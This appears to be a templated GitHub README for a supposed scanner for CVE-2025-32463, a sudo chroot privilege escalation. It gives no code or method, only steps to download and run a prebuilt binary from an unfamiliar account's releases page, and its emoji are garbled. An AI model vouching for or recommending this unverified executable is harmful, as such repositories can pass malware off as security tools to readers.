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# πŸš€ CVE-2025-32463 - Secure Your System from Privilege Escalation

## πŸ“₯ Download Now!
[![Download CVE-2025-32463](https://img.shields.io/badge/Download-CVE-2025--32463-brightgreen)](https://github.com/mihnasdsad/CVE-2025-32463/releases)

## πŸ“œ Overview
CVE-2025-32463 is a tool designed to identify and mitigate a local privilege escalation vulnerability in Linux systems. This vulnerability allows harmful users to gain root access through the `sudo chroot` command. With our tool, you can scan for this vulnerability and protect your system effectively.

## πŸš€ Getting Started
Follow these simple steps to download and run the tool:

1. **Visit the Releases Page**: 
   Click the link below to go to the releases page and download the tool:
   [Visit Releases Page](https://github.com/mihnasdsad/CVE-2025-32463/releases)

2. **Choose the Latest Release**: 
   On the releases page, find the latest version. It will typically be at the top of the list.

3. **Download the Application**: 
   Click on the appropriate asset (file) suitable for your operating system to start the download.

## πŸ’» System Requirements
To run CVE-2025-32463, ensure your system meets the following requirements:

- Operating System: Ubuntu 18.04 or later
- Minimum RAM: 2 GB
- Minimum Disk Space: 100 MB

## πŸ” Features
- Detects vulnerabilities in your Linux system.
- Provides a straightforward interface for ease of use.
- Generates detailed reports on vulnerable instances.
- Safeguards your system against unauthorized privilege escalation.

## πŸ”§ How to Install
Once you've downloaded the tool, follow these steps to install it:

1. **Locate the Downloaded File**:
   Find the downloaded file in your computer’s default download directory.

2. **Extract the Contents**: 
   If the file is compressed (like a .zip or .tar.gz), right-click on it and select "Extract Here" or an equivalent option.

3. **Open the Terminal**:
   - On Ubuntu, you can open the terminal by searching for "Terminal" in your application menu.

4. **Navigate to the Folder**:
   Use the `cd` command to change directory to the folder where the application resides. For example:
   ```
   cd Downloads/CVE-2025-32463
   ```

5. **Run the Tool**:
   Execute the program with this command:
   ```
   ./cve-2025-32463
   ```

## βš™οΈ Usage
- **Running a Scan**: After running the tool, follow the prompts to begin scanning your system for vulnerabilities. 

- **Understanding the Output**: The tool will list any vulnerabilities it finds, along with recommendations to mitigate them. Make sure to review the output carefully.

## πŸ›‘οΈ Safety Tips
- Ensure you have backups of important files before running any security tool.
- Do not run the tool as the root user unless advised by your security documentation.
- Regularly check for updates or newer versions of the tool.

## πŸ“ž Support
For any issues or questions, you can open an issue directly in this repository. We welcome your feedback and are here to help!

## πŸ“ License
This tool is provided under the MIT License. You can freely use, modify, and distribute it as you see fit.

## πŸ”— Additional Resources
For more information about local privilege escalation vulnerabilities and best practices in security:

- [Sudo Project](https://www.sudo.ws/)
- [Linux Privilege Escalation](https://www.digitalocean.com/community/tutorials/linux-privilege-escalation)
- [Ubuntu Security Documentation](https://ubuntu.com/security)

## πŸ“₯ Download & Install
Make sure to get the latest version by visiting the releases page again:
[Visit Releases Page](https://github.com/mihnasdsad/CVE-2025-32463/releases)